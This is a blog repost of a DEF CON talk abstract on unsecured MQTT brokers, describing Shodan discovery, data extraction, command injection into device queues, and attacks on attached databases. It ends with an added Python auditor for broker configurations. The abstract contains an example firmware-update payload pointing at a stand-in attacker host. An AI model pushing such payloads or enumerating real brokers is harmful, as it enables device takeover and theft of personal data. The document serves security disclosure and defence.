Hojt Communication | MQTT IoT protocol completely open to hack on public internet

MQTT IoT protocol completely open to hack on public internet

See on Scoop.it: Secure communication
Lucas Lundgren Senior Security Consultant, FortConsult (Part of NCC Group)
Neal Hindocha Principal Consultant, FortConsult (Part of NCC Group)

The presentation will begin by discussing the protocol (http://mqtt.org/) and results from a simple query on Shodan, showing the number of servers directly available on the internet. We will then go through the protocol specifications, which show that security is more or less non-existent. We are able to directly connect to many of the servers which are open to the internet and, following protocol specifications, see what devices they are communicating with.

We will show how it's possible to extract data on all subscriptions available on the server using a Ruby script, which basically gives a detailed list of the devices. However, it is not only the list of devices we are getting. The data returned by our script also contains things like session tokens (for web pages), social security numbers, phone numbers, names and other sensitive data used for one purpose or another in the communication to and from the devices.

We will show how messages can be posted into the message queues and in turn received by the devices that subscribe to the various queues. This means that we are able to issue commands targeting the range of devices we have discovered that use this protocol. We have, however, also discovered that this is not limited to messages and commands: if supported by the device, we can actually issue firmware updates, simply by sending something similar to "FIRMWAREUPDATEHERE:http://www.attacker.com/filename.bin".

A specific example of what we can see and do is a home automation system we discovered. We got a list of every sensor and its status. Furthermore, we got exact GPS coordinates from the mobile app used to control the home automation. So in this case, not only were we able to control the system, we even knew when the owner was away.

The talk will move on to show various implementations where web clients and SQL servers are hooked in. Much of the communication data is stored in various databases, and because we have access, we can use MQTT to attack the database and web servers.

Multiple tools have been developed by us already to support testing the protocol and fuzzing endpoints. We will show the tools used in various demos and release them at the end of the talk! These tools are currently scripts containing various protocol implementations that can be used to target servers and extract, or inject, data. We also have a small client that implements all interesting areas of the protocol, which we use for server-to-client testing.

We believe this talk is going to have a significant impact on MQTT and anyone who uses it. This is an old protocol from 1999. It's fast and reliable, but it's missing security.

We also believe this talk will trigger a discussion about lightweight IoT protocols and security, which is much needed at this point in time.


An extremely important talk about the MQTT protocol used incorrectly over the Internet. This protocol is widely used by IoT systems and it has NO security in itself. It must be added in the implementation, but this presentation shows that security has been completely neglected in many critical systems. Lucas shows how easy it is to gather data from and manipulate systems such as prisons, ATMs, nuclear plants, smart homes, etc.

See on media.defcon.org
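
What adding security "in the implementation" can look like on the broker side, as an added example that is not from the talk or the original post: a static check of a broker configuration for anonymous access, missing topic ACLs and plaintext listeners on non-loopback interfaces. It assumes a Mosquitto-style configuration file (`allow_anonymous`, `password_file`, `acl_file`, `listener`, `certfile`, `keyfile`); the broker choice, the finding names and both sample configurations are constructed for illustration.

```python
# Added example: static audit of a Mosquitto-style broker config.
# Mosquitto and every path/value in the samples are assumptions (constructed).
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
TLS_KEYS = {"cafile", "certfile", "keyfile", "require_certificate"}

WEAK = """listener 1883
allow_anonymous true
"""
HARDENED = """allow_anonymous false
password_file /etc/mosquitto/passwd
acl_file /etc/mosquitto/acl
listener 8883
certfile /etc/mosquitto/server.crt
keyfile /etc/mosquitto/server.key
listener 1883 127.0.0.1
"""

def parse_conf(text):
    """Split a config into broker-wide options and per-listener TLS options."""
    glob, listeners = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        if key == "listener":
            port, _, bind = value.strip().partition(" ")
            # No bind address means the listener accepts on every interface.
            listeners.append({"port": int(port), "bind": bind.strip() or "0.0.0.0"})
        elif listeners and key in TLS_KEYS:
            listeners[-1][key] = value.strip()
        else:
            glob[key] = value.strip()
    return glob, listeners

def audit(text):
    """Return findings for missing authentication, authorization and TLS."""
    glob, listeners = parse_conf(text)
    findings = []
    if glob.get("allow_anonymous") != "false":
        findings.append("anonymous-clients-not-explicitly-denied")
    if "password_file" not in glob:
        findings.append("no-password-file")
    if "acl_file" not in glob:
        findings.append("no-topic-acl")
    for lst in listeners:
        has_tls = all(k in lst for k in ("certfile", "keyfile"))
        if lst["bind"] not in LOOPBACK and not has_tls:
            findings.append(f"plaintext-listener:{lst['port']}")
    return findings
```

`audit(WEAK)` reports all four findings, while `audit(HARDENED)` returns an empty list because the only plaintext listener is bound to loopback.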